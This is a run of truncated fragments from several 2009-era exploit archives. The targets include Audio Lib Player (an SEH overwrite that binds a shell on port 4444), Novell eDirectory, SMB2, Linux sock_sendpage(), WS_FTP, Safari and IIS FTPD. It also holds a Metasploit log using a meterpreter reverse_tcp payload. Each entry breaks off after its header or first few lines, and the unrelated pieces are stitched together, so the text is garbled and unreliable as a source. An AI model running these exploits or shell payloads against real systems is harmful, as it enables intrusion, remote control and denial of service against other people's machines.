# Audio Lib Player m3u SEH overwrite # product: http://www.toocharger.com/telecharger/logiciels/audio-lib-player/19056.htm # Usage: Create playlist, load exploit.m3u and connect to shell on port 4444 # # $ nc 4444 # Microsoft Windows X
Affected Software: Novell eDirectory 8.8 SP5 Vulnerability Description: Novell eDirectory 8.8 SP5 is vulnerable to a denial of service attack. If a remote attacker sends Unicode strings with Http Request to 8028 port (8028 is the default port of Nov
/*wonderfulcaricatureofexploitability.cAKAGemStone/S 6.3.1 stoned Local Buffer Overflow ExploitJeremy Brown [0xjbrown41@gmail.com//jbrownsec.blogspot.com//krakowlabs.com] 09.07.2009********************************************************************
#!/usr/bin/python# When SMB2.0 recieve a char in the Process Id High SMB header fieldit dies with a# PAGE_FAULT_IN_NONPAGED_AREAfrom socket import socketfrom time import sleephost = IP_ADDR, 445buff = (x00x00x00x90 # Begin SMB header: Session me
-------------------exploit.c-------------------------- /* * Linux sock_sendpage() NULL pointer dereference * Copyright 2009 Ramon de Carvalho Valle ramon@risesecurity.org * * This program is free software; you can redistribute it and/or modify * it
#!/usr/bin/perl# nocoolnameforawsftppoc.pl# AKA# Ipswitch WS_FTP 12 Professional Remote Format String 0day PoC## Jeremy Brown [0xjbrown41@gmail.com//jbrownsec.blogspot.com//krakowlabs.com] 09.07.2009## ***********************************************
#!/usr/bin/perl# letsgosurfinnowonsafari.pl# AKA# Safari 3.2.3 (Win32) JavaScript 'eval' Remote Denial of Service Exploit## Jeremy Brown [0xjbrown41@gmail.com//jbrownsec.blogspot.com//krakowlabs.com] 09.07.2009## ************************************
#--attack-log-- #attacker@dz-labs:~/pentests/metasploit/framework-3.2/trunk$ ./msfcli exploit/windows/ldap/sidvault_ldap #PAYLOAD=windows/meterpreter/reverse_tcp LHOST= RHOST= E #[*] Please wait while we load the module tree...
***** MS IIS FTPD DoS ZER0DAY ***** There is a DoS vulnerability in the globbing functionality of IIS FTPD. Anonymous users can exploit this if they have read access to a directory!!! Normal users can exploit this too if they can read a directory. E